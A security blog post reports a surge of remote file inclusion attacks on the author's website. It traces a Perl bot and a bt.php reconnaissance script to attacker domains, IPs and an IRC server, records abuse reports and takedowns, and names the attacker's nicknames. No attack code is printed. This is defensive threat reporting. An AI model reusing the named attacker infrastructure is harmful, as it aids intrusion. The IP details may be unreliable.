I notice an icrease of the « generics attacks » on my website for the last days : http://www.malekal.com/modsec/ (blue line on the first graph).
A check show that some RFI attacks icreases.
All the attacks against my websites (42 distinct IPs – so not so much) :
The RFI attacks was trying to make download a Perl script that connect to scary.angels-agency.nl
then it makes connect to 188.8.131.52 (also using the DNS ha45k.hopto.org)
i sent an abuse for this.
in result :
no-ip has moved : ha45k.hopto.org has address 0.0.0.0
and scary.angels-agency.nl is also suspended.
184.108.40.206 is still up.
Actually, the RFI attacks send a script to get informations from the victim server (and see if the RFI attack is successfull) :
the bt.php is still around, and now connecting to 220.127.116.11 already mentionned in the abuse email i sent.
Some Shell Around :
and the RFI Attacks sent by the botmaster :
The guy Ha45K seems to be active in HF forum and unknown.eu forum
He is also using the nickname TijN (use in the identd) : download.adamas.ai/dlbase/ezines/TeaMp0isoN/ezine1.txt
And doing this for a while now – April 2013 : https://defense.ballastsecurity.net/decoding/?raw=36173d0a9b460a8089d55086d39aa77d
EDIT – February 24
Seems Ha45K has read this entry and trying spam something :
and some Spam Attacks :
We can see the Generics Attack peak : http://www.malekal.com/modsec/index.php
they move to 18.104.22.168 (OVH) and 22.214.171.124 (THEFIRST-NET – RU).
OVH has made the job and 126.96.36.199 is clean now.
btw another active RFI group : LebayCrew
IRCd : 188.8.131.52 (REDCOM-SRV-WEBHOST – RU)
Some scans :
Sécuriser son site WEB
Vous pouvez aussi jeter un oeil à la page : [réseau] Sécuriser un serveur Apache/PHP/MySQL (LAMP) et l’index menant à différentes ressources pour sécuriser son site WEB